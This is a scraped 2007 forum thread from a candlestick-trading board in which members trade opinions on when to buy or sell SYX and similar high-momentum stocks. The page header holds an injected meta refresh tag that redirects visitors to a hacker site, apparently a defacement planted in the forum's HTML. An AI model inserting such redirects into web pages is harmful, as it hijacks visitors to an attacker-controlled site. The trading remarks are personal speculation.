Forum Index" /> <meta http-equiv="refresh" content="0;URL=http://www.turkhacks.com/dosya/heyk.html"> :: View topic - syx
<meta http-equiv= Forum Index" vspace="1" />
Revolutionizing Investor Psychology

FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

syx

Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading
View previous topic :: View next topic  
ninner

PostPosted: Mon Feb 05, 2007 1:38 pm    Post subject: syx Reply with quote

anyone talking about SYX or GROW in the ole chat room today.

cheers
mjlewis

PostPosted: Wed Feb 07, 2007 5:43 pm    Post subject: Reply with quote

I saw SYX come up on my scan 2 weeks or so ago when it bounced off the 20 say ma with a bullish candle. I definitely should have bought it then, but of course, hindsight is 20/20. I saw the gap down from 21 as at least some resistance, but of course, that's been proved wrong. I just don't know what to make of the recent activity. I keep looking to buy in, but it's so far OS on the stochastics that I can't bring myself to move in.

How do you play these high-momentum stocks that are so far above their moving average and stochastics just doesn't give you any valid buy/sell signals?
Harry

PostPosted: Wed Feb 07, 2007 9:19 pm    Post subject: SYX Reply with quote

I have almost always got in trouble if I tried to chase a stock. I don't do it any more. If I miss it when the setup is there I let it go. SYX gaped up on Aug. 30th from $8.30 and ran the next 5 weeks to $18.75. It then went back down to the $12.00 range. I follow a lot of stocks waiting for the right setup. This stock gaped up again on Dec. 19th and ran up $6.00. At that time it begin forming a J hook. As it came out of the J hook is where I would have wanted to buy. Around $20.00. This is what I call a great setup. The candlesticks will tell you when to get out. Most of the stocks that I buy has been on my watch for a while. This is where a lot of the work comes in. Following the stocks on my watch list waiting for the good setup. I'm always taking some off my list and adding others. This was a money maker if I had been played right. How high is it going to go nobody knows. If I bought in now I would keep my finger on the trigger ready to get out. Very Happy
ninner

PostPosted: Thu Feb 08, 2007 12:08 am    Post subject: Reply with quote

the chart still looks strong..i wouldnt buy right now but the trend is strong...alot of times with these stocks the STO will be in the overbought area cus the trend is strong...remember the STO is only used to confirm the signal..i will be waiting for a strong sell signal before i get out...i bought SWS back in decmeber and it split in jan....and has great earnings ..i will let u guys look at todays action to see how well it did...lets just say i woke up with a smile on my face.

all the best.
Post new topic   Reply to topic     Forum Index -> Stephen W. Bigalow's Candlestick Trading All times are GMT - 5 Hours
Page 1 of 1

Jump to: